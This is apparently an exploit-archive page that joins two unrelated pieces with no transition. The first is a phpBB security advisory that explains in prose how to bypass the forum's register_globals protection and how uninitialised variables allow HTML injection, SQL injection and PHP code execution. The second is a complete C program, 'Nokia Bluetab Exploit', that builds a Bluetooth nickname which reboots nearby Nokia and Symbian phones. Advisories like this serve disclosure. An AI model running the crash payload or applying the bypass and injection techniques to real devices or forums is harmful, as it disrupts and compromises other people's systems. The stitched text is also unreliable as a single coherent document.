To get rid of possible security problems caused by not properly
initialised variables phpBB comes with the following piece of
code, that is intended to deregister global variables, which were
created because of the register_globals directive. Unfortunately
there are atleast 3 ways to bypass the protection.

// PHP4+ path
$not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS',
'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS',
'HTTP_SESSION_VARS', 'HTTP_ENV_VARS',
'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');

// Not only will array_merge give a warning if a parameter
// is not an array, it will actually fail. So we check if
// HTTP_SESSION_VARS has been initialised.
if (!isset($HTTP_SESSION_VARS))
{
$HTTP_SESSION_VARS = array();
}

// Merge all into one extremely huge array; unset
// this later
$input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS,
$HTTP_COOKIE_VARS, $HTTP_SERVER_VARS,
$HTTP_SESSION_VARS, $HTTP_ENV_VARS,
$HTTP_POST_FILES);

unset($input['input']);
unset($input['not_unset']);

while (list($var,) = @each($input))
{
if (!in_array($var, $not_unset))
{
unset($$var);
}
}

unset($input);

Bypass Vulnerabilities
----------------------

[1] In PHP5 <= 5.0.5 it is possible to register f.e. the global
variable $foobar by supplying a GET/POST/COOKIE variable
with the name 'foobar' but also by supplying a GPC variable
called 'GLOBALS[foobar]'. If the variable is supplied in
that way, the code above will not try to unset $foobar, but
$GLOBALS, which completely bypasses the protection.

[2] When the session extension is not started by a call to
session_start(), PHP does not know about the variables
$_SESSION or $HTTP_SESSION_VARS, which means, it is possible
to fill them with any value if register_globals is turned on.
Combined with the fact (that was even documented in the phpBB
code), that array_merge() will fail in PHP5, when at least
one of the parameters is not an array, it is possible for an
attacker to simply set HTTP_SESSION_VARS to a string and let
the complete protection fail, because $input ends up empty.

[3] When register_long_array is turned off PHP does not know
anymore about all the HTTP_* variables. This means they can
be filled with anything that is completely unrelated to the
existing global variables. It is obvious that the protection
cannot work, when this configuration is choosen.

Additonally to the 3 possible ways to bypass the globals
deregistration code, several not properly initalised variables
were disclosed to the vendor, that can even lead to remote code
execution.

Not properly initialised variables
----------------------------------

[1] Within usercp_register.php the variable 'error_msg' is not
properly initialised and can therefore be used to inject
arbitrary HTML code

[2] Within login.php the variable 'forward_page' is not properly
initialised and can be used to inject arbitrary HTML code

[3] Within search.php the variable 'list_cat' is not properly
initialised and can be used to inject arbitrary HTML

[4] Within usercp_register.php the variable 'signature_bbcode_uid'
is not properly initialised and can be used for SQL injection
of arbitrary 'field=xxx' statements into queries operating
on the user table, when magic_quotes_gpc is turned off.

[5] The same variable [4] can be used to inject f.e. the 'e'
modifier into the first parameter of a preg_replace()
statement, which means, that the second parameter is
evaluated as PHP code. Because the second parameter is
entirely filled with the user supplied signature, it is
possible to execute any PHP code. This can be exploited,
no matter if magic_quotes_gpc is turned on or off, just
2 different code paths need to be triggered.

Proof of Concept:

The Hardened-PHP project is not going to release exploits for any
of these vulnerabilities to the public.

/*
      Nokia Bluetab Exploit
      Found & coded by Qnix
 
 - This Exploit will creat file called bluetab.txt with your
   bluetooth nickname, send the file to your nokia mobile
   open it copy the nickname and paste it to your bluetooth
   nickname, if any one search and find your nickname his
   mobile will restart .
 - this exploit work on many other symbian and java mobiles .

   Qnix - Qnix@bsdmail.org

*/

#include <stdio.h>
#define  tab1 0x09
#define  tab2 0x2E
#define  dot1 0x0A

int main(int argc,char *argv[])
{

 FILE *bluetab;

 if(argc < 2)
 {
   msgm();
   printf("Useage : ./bluetab <nickname>\n");
   return 0;
 }
 else
 {
   msgm();
   printf("bluetab.txt file created with your nickname . \n");
 }
 
 bluetab = fopen("bluetab.txt","w");
 if(!bluetab)
 {
   msgm(); 
   printf("Some kind of file error!\n");
   return 0;
 }

 
 fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1);
 fclose(bluetab);
 return 0;
 
}

msgm()
{

  printf(" ------------------------------- \n");
  printf("     Nokia Bluetab Exploit       \n");
  printf("       found & coded by          \n");
  printf("       Qnix@bsdmail.org          \n");
  printf(" ------------------------------- \n\n");
}

/* v1 2005-03-04 milw0rm.com */

# milw0rm.com [2005-09-23]